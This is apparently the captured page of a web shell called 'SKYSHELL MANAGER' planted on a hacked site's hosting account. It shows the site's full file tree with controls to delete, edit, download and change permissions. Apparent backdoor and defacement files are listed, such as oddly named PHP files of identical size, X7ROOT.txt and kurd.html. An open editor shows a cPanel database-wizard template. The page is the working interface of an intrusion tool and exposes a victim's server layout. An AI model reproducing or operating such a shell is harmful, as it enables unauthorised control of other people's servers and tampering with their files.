📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: wizard4.html.tt
[% SET CPANEL.CPVAR.dprefix = "../"; # Case 158089: Determine how much to chop off of the database name before returning to step 2 SET dbownerprefix = ExpVar.expand('$dbownerprefix'); SET prefix_length = dbownerprefix.length(); SET server_location = execute("Mysql", "locate_server" {}); # 94937: Errors can contain XSS. We don't want this function to output directly to the page. SET privsStr = ""; IF RAW_FORM.defined('ALL'); privsStr = "ALL"; ELSE; SET privs = []; FOR pair = RAW_FORM; IF pair.key.match('^privileges'); privs.push(pair.value); END; END; privsStr = privs.join(','); END; SET setprivs = execute('Mysql', 'set_privileges_on_database', { user => RAW_FORM.item('user'), database => RAW_FORM.item('db'), privileges => privsStr, }); %] [% WRAPPER '_assets/master.html.tt' app_key = 'mysql_database_wizard' -%] <div class="body-content"> <div class="section"> <h2>[% locale.maketext("Step 4: Complete the Task") %]</h2> [% IF !setprivs.status %] <div class="alert alert-danger" id="userAddedError"> <span class="glyphicon glyphicon-remove-sign" id="userAddedErrorImg"></span> <span id="userAddedErrorMsg">[% locale.maketext("User “[_1]” could not be added to the database “[_2]”.",FORM.item('user'),FORM.item('db')) %]</span> <span id="userAddedErrorDetails">[% setprivs.errors.join('<br>') FILTER html %]</span> </div> [% ELSE %] <div class="alert alert-success" id="userAddedSuccess"> <span class="glyphicon glyphicon-ok-sign" id="userAddedSuccessImg"></span> <span id="userAddedSuccessMsg">[% locale.maketext("User “[_1]” was added to the database “[_2]”.",FORM.item('user'),FORM.item('db')) %]</span> </div> [% END %] [% IF server_location.data.is_remote %] <br /> <div class="formbox"> <h4>[% locale.maketext("Remote Database Host") %]</h4> <p id="remoteMySQL"> [% locale.maketext("The database server‘s address is “[_1]”. When connecting to the database server you must specify this host.", server_location.data.remote_host) %] </p> </div> <br /> [% END %] <br /> <br /> <div> <a href="wizard1.html" id="step1"> [% locale.maketext("Add another database.") %] </a><br /> <br /> <a href="wizard2.html?db=[% RAW_FORM.item('db').substr(prefix_length) FILTER uri %]&nocreate=1" id="step2"> [% locale.maketext("Add another user for your database.") %] </a><br /> <br /> <a href="index.html" id="index"> [% locale.maketext("Return to Manage My Databases.") %] </a><br /> <br /> <a href="../index.html" id="home"> [% locale.maketext("Return Home") %] </a> </div> </div> </div> [% END #wrapper -%]
Save